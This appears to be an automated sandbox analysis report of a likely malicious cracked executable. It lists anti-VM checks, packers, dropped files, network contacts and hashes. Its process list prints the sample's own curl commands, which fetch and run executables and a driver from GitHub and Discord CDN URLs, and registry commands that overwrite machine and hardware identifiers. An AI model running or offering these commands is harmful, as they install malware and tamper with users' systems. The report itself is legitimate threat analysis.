Analysis Overview
SHA256
20ffe6d5ffeefecc28bef795ba84e3bb8339522e103c32705b0360f24051b12c
Threat Level: Likely malicious
The file impact_cracked.exe was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Checks BIOS information in registry
VMProtect packed file
Themida packer
Executes dropped EXE
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-22 00:14
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-22 00:14
Reported
2023-12-22 00:16
Platform
win10v2004-20231215-en
Max time kernel
74s
Max time network
80s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\IME\AppleCleaner.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\IME\AppleCleaner.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\IME\AppleCleaner.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IME\AppleCleaner.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\IME\AppleCleaner.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IME\AppleCleaner.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\GameBarPresenceWriter\Solution.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\Solution64.sys | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\Disk1.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\Disk2.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\GameBarPresenceWriter\Mac.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\IME\AppleCleaner.exe | C:\Windows\system32\curl.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe
"C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe >nul 2>&1
C:\Windows\system32\curl.exe
curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Windows\IME\AppleCleaner.exe
C:\Windows\IME\AppleCleaner.exe
C:\Windows\IME\AppleCleaner.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Windows\IME\AppleCleaner.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
C:\Windows\system32\curl.exe
curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 6131 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 6131 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {613121375-3155415346-1546629722} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 613432124-166506641-25780881 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {613432124-166506641-25780881} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {613432124-166506641-25780881} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 613432124-166506641-25780881 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 613432124-166506641-25780881 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 613710104-174630705-33274807 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 613710104-174630705-33274807 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 5.0.26.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:51269 | tcp | |
| N/A | 127.0.0.1:51271 | tcp | |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:51282 | tcp | |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| N/A | 127.0.0.1:51284 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:51298 | tcp | |
| N/A | 127.0.0.1:51300 | tcp | |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
Files
memory/4948-0-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp
memory/4948-1-0x00007FFC05E10000-0x00007FFC05E12000-memory.dmp
memory/4948-2-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp
memory/4948-6-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp
C:\Windows\IME\AppleCleaner.exe
| MD5 | f96eb2236970fb3ea97101b923af4228 |
| SHA1 | e0eed80f1054acbf5389a7b8860a4503dd3e184a |
| SHA256 | 46fe5192387d3f897a134d29c069ebf39c72094c892134d2f0e77b12b11a6172 |
| SHA512 | 2fd2d28c5f571d40b43a4dd7a22d367ba42420c29627f21ca0a2052070ffb9f689d80dad638238189eed26ed19af626f47e70f1207e10007041c620dac323cc7 |
memory/3192-10-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
C:\Windows\IME\AppleCleaner.exe
| MD5 | 4639664afed57a9e2ebb0373a715f159 |
| SHA1 | a7c166c3eac948aed501aac067214001df4e09b6 |
| SHA256 | af9e98021b05a245873ccf8bc952f89a2a856ad70323ab2d5a6687bdf811fbd3 |
| SHA512 | 5b042a548cb1441b7e5fb2d526db386f0d842d998a8ff5685c9516db5402ad2d1dd7317be22e9c62349d46f961382cbc64db59564f54fe045f507791efea8ff9 |
memory/3192-12-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp
memory/3192-13-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
memory/3192-14-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
memory/3192-15-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
memory/3192-16-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
memory/3192-18-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp